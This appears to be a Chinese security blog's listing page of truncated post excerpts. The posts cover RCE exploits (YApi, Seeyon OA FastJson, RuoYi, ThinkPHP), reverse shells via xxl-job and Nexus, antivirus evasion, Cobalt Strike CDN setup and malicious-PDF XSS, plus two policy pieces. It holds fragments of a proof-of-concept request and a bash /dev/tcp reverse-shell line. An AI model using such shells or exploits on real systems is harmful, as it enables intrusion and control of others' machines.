0x01 BurpSuite插件介绍BurpSuite2021.10.1版本发布于2021年11月11日,并发行了社区版和专业版,属于测试版本,此版本修复了在使用大字体的消息编辑器中启用换行时偶尔遇到...
YApi RCE
YAPI简介YAPI是由去哪儿网移动架构组(简称YMFE,一群由FE、iOS和Android工程师共同组成的最具想象力、创造力和影响力的大前端团队)开发的可视化接口管理工具,是一个可本地部署的、打通前...
致远 OA FastJson rce 回显
自行搭建环境利用方式一路径/seeyon/sursenServletPOCPOST /seeyon/sursenServlet HTTP/1.1 sursenData=%7B%22name%22%3A...
3.0.12版本 Tmymeleaf RCE的终结?(若依ruoyi最新版本后台RCE)
前期利用前段时间看到很多小伙伴研究若依这个系统的漏洞,让我想起若干年前在CNVD交的一个若依任意修改密码洞。https://threedr3am.github.io/images/zsxq/cnvd-...
ThinkPhp 5.x Rce
# /usr/bin/env python3 # -*- coding: utf-8 -*- # @Author: Morker # @Email: [email protected] # @Blog: https://...
xxl-job反弹shell
利用过程点击任务管理、新增一个执行任务,配置如下(运行模式选择shell,cron是linux定时任务,如下0时0分0秒执行一次):进入GLUE面板,写入执行的脚本命令。随意命名备注名称,保存并关闭0...
Nexus反弹shell
Nexus反弹shellhttp://target/#admin/system/tasks 捕获#通用 ['/bin/bash','-c','/bin/bash -i >& /dev/t...
Python免杀火绒、360和Defender
简介之前学习免杀都是使用Metasploit自带的编码进行,从未成功过。也使用过GitHub上别人提供的免杀方法,最近学习并实践发现绕过国内的杀毒软件貌似并不难,本文使用手工分析特征码,使用base6...
cs配置cdn实现域名上线
前期准备国外VPS,用于放置 teamserver谷歌邮箱账号cloudflare.com/ 免费cdncobalt strike将cdn绑定teamserver的ip,之后,启动teamserver...
通过恶意 pdf 执行 xss 漏洞
漏洞测试:下面,我们介绍如何把 JavaScript 嵌入到 PDF 文档之中。我使用的是迅捷 PDF 编辑器未注册版本1、启动迅捷 PDF 编辑器打开一个 PDF 文件,或者使用“创建 PDF 文件...
解读美国国家安全局《限制位置数据暴露》指南
2020年6月,史前最严重的规模最大的一次有关台湾省2000万个人数据泄漏的报道震惊了网络安全界,数据泄露成为2020最为热议的话题。而就在两月后,8月,美国国家安全局(National Securi...
网络数据安全管理条例(征求意见稿)中的那些评估
《网络数据安全管理条例(征求意见稿)》(“《条例》”)将数据安全的风险评估作为一项普遍和常态的风险控制和管理手段,这体现在《条例》对评估的多条款规定上。整体而言,《条例》的评估可以分为年度评估和日常评...
15680